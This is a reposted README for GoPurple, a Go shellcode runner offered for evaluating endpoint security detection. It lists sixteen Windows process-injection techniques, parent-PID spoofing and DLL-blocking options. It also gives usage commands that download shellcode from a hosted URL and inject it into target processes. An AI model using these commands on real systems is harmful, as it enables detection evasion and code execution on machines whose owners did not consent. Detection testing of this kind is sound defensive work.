GoPurple - Yet Another Shellcode Runner Consists Of Different Techniques For Evaluating Detection Capabilities Of Endpoint Security Solutions

This project is a simple collection of various shell code injection techniques, aiming to streamline the process of endpoint detection evaluation, beside challenging myself to get into Golang world.


1 - Requires go installed.

2 - Build the application from the project's directory: go build. Set GOOS=windows if the build system is not Windows.

command line arguments -b string block DLL mode (nonms/onlystore for QueueUserAPC ) -p int Process ID to inject shellcode into -prog string program to inject into -t string shellcode injection technique to use: 1: CreateFiber 2: syscall 3: CreateThreadNative 4: CreateProcess 5: EtwpCreateEtwThread 6: CreateRemoteThread 7: RtlCreateUserThread 8: CreateThread 9: CreateRemoteThreadNative 10: CreateProcessWithPipe 11: QueueUserAPC 12: CreateThreadpoolWait 13: BananaPhone 14: EnumerateLoadedModules 15: EnumChildWindows 16: EnumPageFilesW -u string URL hosting the shellcode ">
  _____                              _  / ____|                            | | | |  __  ___  _ __  _   _ _ __ _ __ | | ___ | | |_ |/ _ \| '_ \| | | | '__| '_ \| |/ _ \ | |__| | (_) | |_) | |_| | |  | |_) | |  __/  \_____|\___/| .__/ \__,_|_|  | .__/|_|\___|              | |              | |              |_|              |_|   by @s3cdev -a string        Program command line arguments  -b string        block DLL mode (nonms/onlystore for QueueUserAPC )  -p int        Process ID to inject shellcode into  -prog string        program to inject into  -t string        shellcode injection technique to use:         1: CreateFiber         2: syscall         3: CreateThreadNative         4: CreateProcess         5: EtwpCreateEtwThread         6: CreateRemoteThread         7: RtlCreateUserThread         8: CreateThread         9: CreateRemoteThreadNative         10: CreateProcessWithPipe         11: QueueUserAPC         12: CreateThreadpoolWait         13: BananaPhone         14: EnumerateLoadedModules         15: EnumChildWindows         16: EnumPageFilesW  -u string        URL hosting the shellcode


A shellcode needs to be generated,this can be done using tools such as msfvenom or shad0w. Then the shellcode needs to be hosted to be remotely downloaded and executed on the remote machine. For the sake of clarity, the below demos illustrate different ways of using the tool.

1 - Shellcode injection using BananaPhone method + Shad0w as the shellcode generator

2 - Shellcode injection using QueueUserAPC technique + Shad0w as the shellcode generator + spoofing the parent ID (explorer as the parent ID) + process launching by spoofed parent that contains the shellcode(calc) + protecting the process from unsigned DLL hook, so only Microsoft signed DLL can hook into the process.

3- Shellcode injection using CreateFiber + msfvenom as the shellcode generator

How To Use:
1 - gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)2 - gopurple.exe -u urlhostingpayload -t 2 (Syscall)3 - gopurple.exe -u urlhostingpayload -t 3 (CreateThreadNative)4 - gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)5 - gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)6 - gopurple.exe -u urlhostingpayload -t 6 -p targetprocess (CreateRemoteThread)7 - gopurple.exe -u urlhostingpayload -t 7 -p targetprocess (RtlCreateUserThread)8 - gopurple.exe -u urlhostingpayload -t 8 (CreateThread)9 - gopurple.exe -u urlhostingpayload -t 9 -p targetprocess (CreateRemoteThreadNative)10 - gopurple.exe -u urlhostingpayload -t 10 -prog porgram -a processargument (ex:C:\Windows\System32\WindowsPowerShell\v1.0) and processargument(ex:Get-Process)  (CreateProcessWithPipe)11 - gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll(nonms or onlystore)  (QueueUserAPC)nonms = only DLLs that are signed by Microsoft can hook into the processonlystore = only Microsoft store application's process can hook into the process12 - gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWait)13 - gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)14-  gopurple.exe -u urlhostingpayload -t 14 (EnumerateLoadedModules)15-  gopurple.exe -u urlhostingpayload -t 15 (EnumChildWindows)16-  gopurple.exe -u urlhostingpayload -t 16 (EnumPageFilesW)


All the credits go to following guys for their awesome researches,tools and inspiration:

Thanks to brimston3 for his support and contribution











Future Plans
  • Adding more techniques
  • More structured code


[1.0.3] - 2021-03-28

  • EnumPageFilesW technique

[1.0.2] - 2021-03-25

  • EnumChildWindows technique

[1.0.0] - 2021-03-22

  • EnumerateLoadedModules technique

Legal Disclaimer

This project is made for educational and ethical testing purposes only.Usage of GoPurple for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assume no liability and are not responsible for any misuse or damage caused by this program

GoPurple - Yet Another Shellcode Runner Consists Of Different Techniques For Evaluating Detection Capabilities Of Endpoint Security Solutions GoPurple - Yet Another Shellcode Runner Consists Of Different Techniques For Evaluating Detection Capabilities Of Endpoint Security Solutions Reviewed by Anonymous on 4:39 AM Rating: 5